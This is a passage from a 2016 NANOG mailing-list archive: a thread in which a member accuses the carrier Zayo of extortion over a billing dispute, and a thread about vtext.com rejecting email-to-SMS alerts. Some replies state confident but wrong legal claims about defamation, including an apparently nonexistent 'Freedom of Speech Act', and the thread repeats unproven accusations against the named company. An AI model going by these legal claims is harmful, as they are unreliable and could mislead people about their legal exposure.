SP's claim about their records system not tracking the actual amounts due under specific agreements causing the conclusion that the output from the record system is inscrutible and infallible. -- -JH From fw at deneb.enyo.de Mon Aug 15 18:09:39 2016 From: fw at deneb.enyo.de (Florian Weimer) Date: Mon, 15 Aug 2016 20:09:39 +0200 Subject: Zayo Extortion In-Reply-To: (Chris Knipe's message of "Mon, 15 Aug 2016 17:49:06 +0200") References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <13841.1471275688@turing-police.cc.vt.edu> Message-ID: <87y43xaopo.fsf@mid.deneb.enyo.de> * Chris Knipe: > Although a company that can't manage their book keeping properly, is IMHO > enough reason to not use them... :-) Ther used to be a saying that you could choose between carries with functional billing and carriers with a functional network. From SNaslund at medline.com Mon Aug 15 18:19:19 2016 From: SNaslund at medline.com (Naslund, Steve) Date: Mon, 15 Aug 2016 18:19:19 +0000 Subject: Zayo Extortion In-Reply-To: <87y43xaopo.fsf@mid.deneb.enyo.de> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <13841.1471275688@turing-police.cc.vt.edu> <87y43xaopo.fsf@mid.deneb.enyo.de> Message-ID: <9578293AE169674F9A048B2BC9A081B401E6685ACF@MUNPRDMBXA1.medline.com> That is pretty close to my experience. I would say nearly all carriers have billing nightmares and some of them have networks that work well. Best carrier for billing is a bit like asking for the best ice skater in hell. Steven Naslund Chicago IL -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Florian Weimer Sent: Monday, August 15, 2016 1:10 PM To: Chris Knipe Cc: nanog at nanog.org Subject: Re: Zayo Extortion * Chris Knipe: > Although a company that can't manage their book keeping properly, is > IMHO enough reason to not use them... :-) Ther used to be a saying that you could choose between carries with functional billing and carriers with a functional network. From bill at herrin.us Mon Aug 15 18:19:03 2016 From: bill at herrin.us (William Herrin) Date: Mon, 15 Aug 2016 14:19:03 -0400 Subject: Zayo Extortion In-Reply-To: <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Message-ID: On Mon, Aug 15, 2016 at 8:29 AM, Mike Hammett wrote: > Try more facts and less emotion. +1 > From: "HonorFirst Name Ethics via NANOG" > they relentlessly levied disconnect threats with short timelines > such as: "if you don't pay us $128,000 by this Friday, we will > shut your operation down." Short timeline or short by the time you became aware of it? It's not unusual in this business for POCs to fall out of date where an SP can't communicate a problem to you, or for billing and technical POCs at an organization to not communicate with each other. If this is a case of the threats finally got serious enough that the other guy figured he should mention them to you, that doesn't really qualify as a short timeline. As far as raising the rent goes... that's frankly an industry-wide problem. The SP runs 12 different contracts with you with 12 different contract periods for interrelated services that from your perspective are all-or-none. Your contract period on one comes to a close and when you ask for the renewal price you get sticker-shock. It's even more frustrating when it's all-or-none interrelated services from three or four vendors and only one decides to raise the rent. Live and learn and in the future do the extra legwork to make your service contracts at any single location co-terminating. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From SNaslund at medline.com Mon Aug 15 18:23:02 2016 From: SNaslund at medline.com (Naslund, Steve) Date: Mon, 15 Aug 2016 18:23:02 +0000 Subject: Zayo Extortion In-Reply-To: References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: <9578293AE169674F9A048B2BC9A081B401E6685AE5@MUNPRDMBXA1.medline.com> Exactly, It is unlikely they will ever be able to collect on a debt they do not have documentation to support but that does not stop them from disconnecting your service whenever they want. You might have legal recourse to go after them if they disconnect you but it won?t be fast and it won't give you immediate connectivity. Talk to your lawyers and in the meantime I would be shopping some alternative service for when things get nasty. Steven Naslund Chicago IL -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Jimmy Hess Sent: Monday, August 15, 2016 1:00 PM To: HonorFirst Name Ethics Cc: nanog at nanog.org Subject: Re: Zayo Extortion On Sat, Aug 13, 2016 at 11:50 AM, HonorFirst Name Ethics via NANOG wrote: > to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." > All the while they relentlessly levied disconnect threats with short > timelines such as: "if you don't pay us $128,000 by this Friday, we will shut your operation down." [...] >At one point their lawyers and accounting people had the nerve to say >"our accounting system does not track invoice details Are you talking with your SP's lawyers without your a legal team of your own present and advising you? I think one of the first things they should tell you is not to discuss pending disputes in public. Time to get a consultation with your own Lawyers to assist with billing dispute resolution, ASAP. Provided there is a reasonable agreement in place: I think You ought to be able to at least temporarily delay your SP from turning off services, while you work out your billing dispute. The service provider could be subject to liability by turning off services which you have not agreed to disconnect. Your lawyers should be able to refute a SP's claim about their records system not tracking the actual amounts due under specific agreements causing the conclusion that the output from the record system is inscrutible and infallible. -- -JH From larrysheldon at cox.net Tue Aug 16 00:20:17 2016 From: larrysheldon at cox.net (Larry Sheldon) Date: Mon, 15 Aug 2016 19:20:17 -0500 Subject: Zayo Extortion In-Reply-To: <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Message-ID: On 8/15/2016 07:29, Mike Hammett wrote: > Try more facts and less emotion. I remember a day when I was banned from NANOG of less emotion and lots more factual content. > ----- Original Message ----- > > From: "HonorFirst Name Ethics via NANOG" Red-flag line. [much snippage has occurred] > A Zayo victim and a NANOG Member [a little more would have been right] -- "Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid." --Albert Einstein From Larry's Cox account. From erich at gotfusion.net Mon Aug 15 14:19:01 2016 From: erich at gotfusion.net (Kaiser, Erich) Date: Mon, 15 Aug 2016 09:19:01 -0500 Subject: Zayo Extortion In-Reply-To: References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Message-ID: In response to the original email they do do this I have experienced it myself it is usually because of billing issues that they don't know how to resolve. It's complete BS worse than dealing with att. On Aug 15, 2016 9:14 AM, "Paras Jha" wrote: > Yeah, I see a wall of text, but no real evidence to substantiate it. > > On Mon, Aug 15, 2016 at 8:29 AM, Mike Hammett wrote: > > > Try more facts and less emotion. > > > > > > > > ----- > > Mike Hammett > > Intelligent Computing Solutions > > > > Midwest Internet Exchange > > > > The Brothers WISP > > > > > > ----- Original Message ----- > > > > From: "HonorFirst Name Ethics via NANOG" > > To: nanog at nanog.org > > Sent: Saturday, August 13, 2016 11:50:46 AM > > Subject: Zayo Extortion > > > > Question to the NANOG community, Is anyone else being extorted by Zayo? > Is > > Zayo threatening shutdown over bogus and fabricated charges? > > > > The purpose of this message to the group is twofold: 1) to share our > > experience being extorted by Zayo with the community and 2) to understand > > the depth and extent of Zayo's less than ethical behavior by getting > > feedback from the community. > > > > Abovenet was a great organization with quality service, reasonable prices > > and nice folks to work with. Since being acquired by Zayo we have seen a > > significant degradation of service quality and responsiveness which is > not > > unusual from a provider, but Zayo has taken things to a level of low > ethics > > that would make Tony Soprano proud. > > Most interestingly they seem to identify points where you are dependent > on > > them and threaten a shut down unless you pay them some arbitrary amount. > In > > our case we use multiple Zayo IP, Transport, and Colo Services -- they > set > > their extortion amount at $128,000. A completely arbitrary and fabricated > > number. They put significant pressure threatening to shut us down by > > setting their lawyers on us. > > Our detailed contract breakdowns, invoice and payment spreadsheets, along > > with all other commonsense and professional efforts were simply > > disregarded. At one point their lawyers and accounting people had the > nerve > > to say "our accounting system does not track invoice details -- it only > > shows the total amount due so your numbers mean nothing to us." All the > > while they relentlessly levied disconnect threats with short timelines > such > > as: "if you don't pay us $128,000 by this Friday, we will shut your > > operation down." > > We have had anecdotal feedback that we are not alone in our experience > and > > that there are many more like us. If you and your company have had a > > similar experience with Zayo, please share it with the group or if like > us > > you are concerned about retaliation from Zayo, please respond privately. > > > > If the group shares their experiences the public shaming may drive Zayo > to > > stop operating like mafia thugs. If the problem is as common as we > suspect, > > it may warrant getting the Attorney General involved. > > > > In the mean time, I strongly urge anyone already in a relationship with > > Zayo or considering a relationship to make sure your are well diversified > > with other more ethical carriers. Otherwise please consider another > > organization to work with. > > In our case we were better of with Ransomeware, than Zayo as a vendor! > Its > > cheaper and less damaging > > > > A Zayo victim and a NANOG Member > > > > > > -- > Regards, > Paras > > President > ProTraf Solutions, LLC > Enterprise DDoS Mitigation > From amitchell at isipp.com Tue Aug 16 14:45:29 2016 From: amitchell at isipp.com (Anne Mitchell) Date: Tue, 16 Aug 2016 08:45:29 -0600 Subject: Zayo Extortion In-Reply-To: References: Message-ID: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> >> to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." >> All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, >> we will shut your operation down." > [...] >> At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details > > Are you talking with your SP's lawyers without your a legal team of > your own present and advising you? > I think one of the first things they should tell you is not to discuss > pending disputes in public. Time to get > a consultation with your own Lawyers to assist with billing dispute > resolution, ASAP. Not to mention that accusing someone of a crime (extortion), in public (in this context I would argue that this is public, especially as the term 'community' was used in the allegation) is a pretty serious thing. Anne P. Mitchell, Attorney at Law Legislative Consultant CEO/President, SuretyMail Email Reputation Certification and Inbox Delivery Assistance http://www.SuretyMail.com/ http://www.SuretyMail.eu/ Available for consultations by special arrangement. Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law) Member, California Bar Cyberspace Law Committee Member, Colorado Cybersecurity Consortium Member, Asilomar Microcomputer Workshop Committee Ret. Professor of Law, Lincoln Law School of San Jose Ret. Chair, Asilomar Microcomputer Workshop amitchell at isipp.com | @AnnePMitchell Facebook/AnnePMitchell | LinkedIn/in/annemitchell From niels=nanog at bakker.net Tue Aug 16 15:53:23 2016 From: niels=nanog at bakker.net (Niels Bakker) Date: Tue, 16 Aug 2016 17:53:23 +0200 Subject: Zayo Extortion In-Reply-To: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> Message-ID: <20160816155323.GF3955@excession.tpb.net> * amitchell at isipp.com (Anne Mitchell) [Tue 16 Aug 2016, 16:46 CEST]: [...] >Attorney at Law >Legislative Consultant An actual lawyer! Where were you in the CloudFlare booters thread, though? -- Niels. -- "It's amazing what people will do to get their name on the internet, which is odd, because all you really need is a Blogspot account." -- roy edroso, alicublog.blogspot.com From Valdis.Kletnieks at vt.edu Tue Aug 16 16:52:25 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 16 Aug 2016 12:52:25 -0400 Subject: Zayo Extortion In-Reply-To: <20160816155323.GF3955@excession.tpb.net> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <20160816155323.GF3955@excession.tpb.net> Message-ID: <5529.1471366345@turing-police.cc.vt.edu> On Tue, 16 Aug 2016 17:53:23 +0200, Niels Bakker said: > An actual lawyer! Where were you in the CloudFlare booters thread, though? Keeping sensibly quiet, I think... :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 848 bytes Desc: not available URL: From fkittred at gwi.net Tue Aug 16 16:38:59 2016 From: fkittred at gwi.net (Fletcher Kittredge) Date: Tue, 16 Aug 2016 12:38:59 -0400 Subject: Zayo Extortion In-Reply-To: <20160816155323.GF3955@excession.tpb.net> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <20160816155323.GF3955@excession.tpb.net> Message-ID: On Tue, Aug 16, 2016 at 11:53 AM, Niels Bakker wrote: > > An actual lawyer! Where were you in the CloudFlare booters thread, though? > Key legal skills are knowing when to stay out of fights and when to keep one's mouth shut (i.e. most of the time.) -- Fletcher Kittredge GWI 207-602-1134 www.gwi.net From mike-nanog at tiedyenetworks.com Tue Aug 16 21:44:06 2016 From: mike-nanog at tiedyenetworks.com (Mike) Date: Tue, 16 Aug 2016 14:44:06 -0700 Subject: Email to text - vtext.com blacklisting ip Message-ID: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> Hi, I have a server that monitors my network and issues text messages if there are events of note that require human intervention. There is some process filtering that ensures it also is not able to issue more than 1 alert maximum per 5 minutes, to ensure it doesn't flood pagers with messages all screaming the sky is falling when things are not going well. Recently however, this server is no longer able to deliver messages to vtext.com - it gets nothing but 554 errors: telnet 69.78.67.53 25 Trying 69.78.67.53... Connected to 69.78.67.53. Escape character is '^]'. 554 txslspamp10.vtext.com Connection closed by foreign host. Granted on some days during challenging times it can send 30 or 40 messages before we get to it and get it squelched / silenced, but it's otherwise reasonably well behaved IMHO and I don't think we are any heavy volume sender. So I am trying to figure out why it's blacklisted then and am rolling snake eyes. If anyone who is an admin for verizon or who has any insight to share I'd certainly appreciate it. Email to text is a critical function we depend on. Thank you. From josh at imaginenetworksllc.com Tue Aug 16 22:08:54 2016 From: josh at imaginenetworksllc.com (Josh Luthman) Date: Tue, 16 Aug 2016 18:08:54 -0400 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> Message-ID: If it's critical I'd suggest a service than can depended on... Josh Luthman Office: 937-552-2340 Direct: 937-552-2343 1100 Wayne St Suite 1337 Troy, OH 45373 On Aug 16, 2016 5:45 PM, "Mike" wrote: > Hi, > > > I have a server that monitors my network and issues text messages if > there are events of note that require human intervention. There is some > process filtering that ensures it also is not able to issue more than 1 > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > messages all screaming the sky is falling when things are not going well. > Recently however, this server is no longer able to deliver messages to > vtext.com - it gets nothing but 554 errors: > > > telnet 69.78.67.53 25 > Trying 69.78.67.53... > Connected to 69.78.67.53. > Escape character is '^]'. > 554 txslspamp10.vtext.com > Connection closed by foreign host. > > Granted on some days during challenging times it can send 30 or 40 > messages before we get to it and get it squelched / silenced, but it's > otherwise reasonably well behaved IMHO and I don't think we are any heavy > volume sender. So I am trying to figure out why it's blacklisted then and > am rolling snake eyes. If anyone who is an admin for verizon or who has > any insight to share I'd certainly appreciate it. Email to text is a > critical function we depend on. > > > Thank you. > > > From jhall at futuresouth.us Tue Aug 16 23:11:09 2016 From: jhall at futuresouth.us (Jonathan Hall) Date: Wed, 17 Aug 2016 01:11:09 +0200 Subject: Zayo Extortion In-Reply-To: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> Message-ID: <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> Excuse me for chiming in, here? But, if I?m not mistaken (don?t worry, I?m not) - this doesn?t count as ?slander? in any way, shape or form. This mail thread is not any kind of valid FCC controlled or public communications device, as the internet was actually excluded from the public communications device list under the Freedom of Speech Act in? Was it, 1996? Which means, ?slander? can?t be called in this case. You could argue that it can, but you?d lose in court in the long run. If you?re aiming for the defamation card? That?s a very difficult one to prove. I?d counter the argument in a court room by asking the judge to prove the plaintiff is NOT an extortionist scum bag. It certainly works both ways. And either way, defamation requires some form of punitive damage be proven in order to actually win that case. Are you saying that the company he is referencing has some way to claim and directly correlate a loss of income or potential loss of income, either present and/or future, due to the comment made on a mail group? I?d love to see that quantification on paper... None the less, regardless of what one accuses or says on the internet, the usage of the word ?extortion? is quite open for interpretation with regards to context, and making such a statement does not qualify for slander nor defamation. He could feel he?s being extorted, in which case exasperating his opinion publicly is no less legal than me telling you that I don?t really think you?re a good lawyer. Good luck trying to play that card in a courtroom. Short and simple: One could threaten to sue over it, and one could even try. Personally, I?d turn that court room in to a circus act if someone tried. I?d most likely get fined in contempt a few times, but at least even the judge will go home laughing. :) J > On 16 Aug 2016, at 16:45, Anne Mitchell wrote: > > >>> to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." >>> All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, >>> we will shut your operation down." >> [...] >>> At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details >> >> Are you talking with your SP's lawyers without your a legal team of >> your own present and advising you? >> I think one of the first things they should tell you is not to discuss >> pending disputes in public. Time to get >> a consultation with your own Lawyers to assist with billing dispute >> resolution, ASAP. > > Not to mention that accusing someone of a crime (extortion), in public (in this context I would argue that this is public, especially as the term 'community' was used in the allegation) is a pretty serious thing. > > Anne P. Mitchell, > Attorney at Law > Legislative Consultant > CEO/President, > SuretyMail Email Reputation Certification and Inbox Delivery Assistance > http://www.SuretyMail.com/ > http://www.SuretyMail.eu/ > > Available for consultations by special arrangement. > > Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law) > Member, California Bar Cyberspace Law Committee > Member, Colorado Cybersecurity Consortium > Member, Asilomar Microcomputer Workshop Committee > Ret. Professor of Law, Lincoln Law School of San Jose > Ret. Chair, Asilomar Microcomputer Workshop > amitchell at isipp.com | @AnnePMitchell > Facebook/AnnePMitchell | LinkedIn/in/annemitchell > > From sryan at arbor.net Tue Aug 16 23:17:02 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Tue, 16 Aug 2016 23:17:02 +0000 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com>, Message-ID: I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free service for anything critical is asking for trouble. Sent from my Verizon, Samsung Galaxy smartphone -------- Original message -------- From: Josh Luthman Date: 8/16/16 6:09 PM (GMT-05:00) To: Mike Cc: NANOG list Subject: Re: Email to text - vtext.com blacklisting ip If it's critical I'd suggest a service than can depended on... Josh Luthman Office: 937-552-2340 Direct: 937-552-2343 1100 Wayne St Suite 1337 Troy, OH 45373 On Aug 16, 2016 5:45 PM, "Mike" wrote: > Hi, > > > I have a server that monitors my network and issues text messages if > there are events of note that require human intervention. There is some > process filtering that ensures it also is not able to issue more than 1 > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > messages all screaming the sky is falling when things are not going well. > Recently however, this server is no longer able to deliver messages to > vtext.com - it gets nothing but 554 errors: > > > telnet 69.78.67.53 25 > Trying 69.78.67.53... > Connected to 69.78.67.53. > Escape character is '^]'. > 554 txslspamp10.vtext.com > Connection closed by foreign host. > > Granted on some days during challenging times it can send 30 or 40 > messages before we get to it and get it squelched / silenced, but it's > otherwise reasonably well behaved IMHO and I don't think we are any heavy > volume sender. So I am trying to figure out why it's blacklisted then and > am rolling snake eyes. If anyone who is an admin for verizon or who has > any insight to share I'd certainly appreciate it. Email to text is a > critical function we depend on. > > > Thank you. > > > From Sam at SanDiegoBroadband.com Tue Aug 16 23:33:01 2016 From: Sam at SanDiegoBroadband.com (Sam Norris) Date: Tue, 16 Aug 2016 16:33:01 -0700 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com>, Message-ID: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Same boat... We are sending messages to PHONENUMBER at vtext.com and getting bouncebacks or lost items. I assume its because some limits are now being put into place. We are a Verizon subscriber so I am paying, it is not a free service. But .... I am totally up for paid services if you can recommend some that will reliably get us texts to our verizon phones. Sam > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer > Sent: Tuesday, August 16, 2016 4:17 PM > To: Josh Luthman; Mike > Cc: NANOG list > Subject: RE: Email to text - vtext.com blacklisting ip > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free service > for anything critical is asking for trouble. > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > -------- Original message -------- > From: Josh Luthman > Date: 8/16/16 6:09 PM (GMT-05:00) > To: Mike > Cc: NANOG list > Subject: Re: Email to text - vtext.com blacklisting ip > > If it's critical I'd suggest a service than can depended on... > > Josh Luthman > Office: 937-552-2340 > Direct: 937-552-2343 > 1100 Wayne St > Suite 1337 > Troy, OH 45373 > > On Aug 16, 2016 5:45 PM, "Mike" wrote: > > > Hi, > > > > > > I have a server that monitors my network and issues text messages if > > there are events of note that require human intervention. There is some > > process filtering that ensures it also is not able to issue more than 1 > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > > messages all screaming the sky is falling when things are not going well. > > Recently however, this server is no longer able to deliver messages to > > vtext.com - it gets nothing but 554 errors: > > > > > > telnet 69.78.67.53 25 > > Trying 69.78.67.53... > > Connected to 69.78.67.53. > > Escape character is '^]'. > > 554 txslspamp10.vtext.com > > Connection closed by foreign host. > > > > Granted on some days during challenging times it can send 30 or 40 > > messages before we get to it and get it squelched / silenced, but it's > > otherwise reasonably well behaved IMHO and I don't think we are any heavy > > volume sender. So I am trying to figure out why it's blacklisted then and > > am rolling snake eyes. If anyone who is an admin for verizon or who has > > any insight to share I'd certainly appreciate it. Email to text is a > > critical function we depend on. > > > > > > Thank you. > > > > > > From josh at imaginenetworksllc.com Tue Aug 16 23:39:26 2016 From: josh at imaginenetworksllc.com (Josh Luthman) Date: Tue, 16 Aug 2016 19:39:26 -0400 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: Personally PagerDuty and their API. Serious stuff is a phone call (something I rarely get after hours). Josh Luthman Office: 937-552-2340 Direct: 937-552-2343 1100 Wayne St Suite 1337 Troy, OH 45373 On Aug 16, 2016 7:34 PM, "Sam Norris" wrote: > Same boat... We are sending messages to PHONENUMBER at vtext.com and getting > bouncebacks or lost items. I assume its because some limits are now being > put > into place. We are a Verizon subscriber so I am paying, it is not a free > service. But .... I am totally up for paid services if you can recommend > some > that will reliably get us texts to our verizon phones. > > Sam > > > > -----Original Message----- > > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer > > Sent: Tuesday, August 16, 2016 4:17 PM > > To: Josh Luthman; Mike > > Cc: NANOG list > > Subject: RE: Email to text - vtext.com blacklisting ip > > > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free > service > > for anything critical is asking for trouble. > > > > > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > > > > -------- Original message -------- > > From: Josh Luthman > > Date: 8/16/16 6:09 PM (GMT-05:00) > > To: Mike > > Cc: NANOG list > > Subject: Re: Email to text - vtext.com blacklisting ip > > > > If it's critical I'd suggest a service than can depended on... > > > > Josh Luthman > > Office: 937-552-2340 > > Direct: 937-552-2343 > > 1100 Wayne St > > Suite 1337 > > Troy, OH 45373 > > > > On Aug 16, 2016 5:45 PM, "Mike" wrote: > > > > > Hi, > > > > > > > > > I have a server that monitors my network and issues text messages > if > > > there are events of note that require human intervention. There is some > > > process filtering that ensures it also is not able to issue more than 1 > > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > > > messages all screaming the sky is falling when things are not going > well. > > > Recently however, this server is no longer able to deliver messages to > > > vtext.com - it gets nothing but 554 errors: > > > > > > > > > telnet 69.78.67.53 25 > > > Trying 69.78.67.53... > > > Connected to 69.78.67.53. > > > Escape character is '^]'. > > > 554 txslspamp10.vtext.com > > > Connection closed by foreign host. > > > > > > Granted on some days during challenging times it can send 30 or 40 > > > messages before we get to it and get it squelched / silenced, but it's > > > otherwise reasonably well behaved IMHO and I don't think we are any > heavy > > > volume sender. So I am trying to figure out why it's blacklisted then > and > > > am rolling snake eyes. If anyone who is an admin for verizon or who > has > > > any insight to share I'd certainly appreciate it. Email to text is a > > > critical function we depend on. > > > > > > > > > Thank you. > > > > > > > > > > > From jhellenthal at dataix.net Tue Aug 16 23:51:37 2016 From: jhellenthal at dataix.net (J. Hellenthal) Date: Tue, 16 Aug 2016 18:51:37 -0500 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: Unfortunately I am not in the same boat here in Milwaukee WI all messages to vtext.com personal and business on greater that four subnets that we own are being delivered. I would suspect what you are seeing may be a local problem to be resolved soon. -- Onward!, Jason Hellenthal, Systems & Network Admin, Mobile: 0x9CA0BD58, JJH48-ARIN On Aug 16, 2016, at 18:33, Sam Norris wrote: Same boat... We are sending messages to PHONENUMBER at vtext.com and getting bouncebacks or lost items. I assume its because some limits are now being put into place. We are a Verizon subscriber so I am paying, it is not a free service. But .... I am totally up for paid services if you can recommend some that will reliably get us texts to our verizon phones. Sam > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer > Sent: Tuesday, August 16, 2016 4:17 PM > To: Josh Luthman; Mike > Cc: NANOG list > Subject: RE: Email to text - vtext.com blacklisting ip > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free service > for anything critical is asking for trouble. > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > -------- Original message -------- > From: Josh Luthman > Date: 8/16/16 6:09 PM (GMT-05:00) > To: Mike > Cc: NANOG list > Subject: Re: Email to text - vtext.com blacklisting ip > > If it's critical I'd suggest a service than can depended on... > > Josh Luthman > Office: 937-552-2340 > Direct: 937-552-2343 > 1100 Wayne St > Suite 1337 > Troy, OH 45373 > >> On Aug 16, 2016 5:45 PM, "Mike" wrote: >> >> Hi, >> >> >> I have a server that monitors my network and issues text messages if >> there are events of note that require human intervention. There is some >> process filtering that ensures it also is not able to issue more than 1 >> alert maximum per 5 minutes, to ensure it doesn't flood pagers with >> messages all screaming the sky is falling when things are not going well. >> Recently however, this server is no longer able to deliver messages to >> vtext.com - it gets nothing but 554 errors: >> >> >> telnet 69.78.67.53 25 >> Trying 69.78.67.53... >> Connected to 69.78.67.53. >> Escape character is '^]'. >> 554 txslspamp10.vtext.com >> Connection closed by foreign host. >> >> Granted on some days during challenging times it can send 30 or 40 >> messages before we get to it and get it squelched / silenced, but it's >> otherwise reasonably well behaved IMHO and I don't think we are any heavy >> volume sender. So I am trying to figure out why it's blacklisted then and >> am rolling snake eyes. If anyone who is an admin for verizon or who has >> any insight to share I'd certainly appreciate it. Email to text is a >> critical function we depend on. >> >> >> Thank you. From sethm at rollernet.us Wed Aug 17 00:09:42 2016 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 16 Aug 2016 17:09:42 -0700 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: <361dcaa0-fc24-8e00-3705-a8144d8b9816@rollernet.us> On 8/16/16 16:33, Sam Norris wrote: > We are a Verizon subscriber so I am paying, it is not a free > service. Verizon does have an enterprise messaging service with API hooks, such as using SNPP instead of email-to-sms. ~Seth From mel at beckman.org Wed Aug 17 01:24:43 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 17 Aug 2016 01:24:43 +0000 Subject: Zayo Extortion In-Reply-To: <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com>, <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> Message-ID: <98886F8D-BB5A-4852-B32B-60D279D9F858@beckman.org> Jon, You're mistaken. This has nothing to do with being or not being an FCC-controlled medium. It has to do with published statements that may not be true -- which are classified as libel, not slander (slander is spoken, libel is written). If you post it in a mailing list, or on Facebook, it's legally considered published, as long as one other person not party to the matter can view it. You're also mistaken about how the law works. The person making the assertion has the burden of proof. If you say someone is an extortionist, you'd better be able to prove it. All the plaintiff has to do is say "Your honor, I've been libeled, and here are my damages. Please make the defendant compensate me." You will be subpoenaed, and at court the judge will turn to you and say "Where is the proof of your claims?" If you can't deliver, the judgement will go against you. The plaintiff doesn't have to prove a thing. In fact, his claim will automatically be accepted and processed by the legal system up until you appear in court. The cost for you before that point could be thousands of dollars. If you don't show up for court, you automatically lose. -mel beckman -mel beckman On Aug 16, 2016, at 4:12 PM, Jonathan Hall > wrote: Excuse me for chiming in, here? But, if I?m not mistaken (don?t worry, I?m not) - this doesn?t count as ?slander? in any way, shape or form. This mail thread is not any kind of valid FCC controlled or public communications device, as the internet was actually excluded from the public communications device list under the Freedom of Speech Act in? Was it, 1996? Which means, ?slander? can?t be called in this case. You could argue that it can, but you?d lose in court in the long run. If you?re aiming for the defamation card? That?s a very difficult one to prove. I?d counter the argument in a court room by asking the judge to prove the plaintiff is NOT an extortionist scum bag. It certainly works both ways. And either way, defamation requires some form of punitive damage be proven in order to actually win that case. Are you saying that the company he is referencing has some way to claim and directly correlate a loss of income or potential loss of income, either present and/or future, due to the comment made on a mail group? I?d love to see that quantification on paper... None the less, regardless of what one accuses or says on the internet, the usage of the word ?extortion? is quite open for interpretation with regards to context, and making such a statement does not qualify for slander nor defamation. He could feel he?s being extorted, in 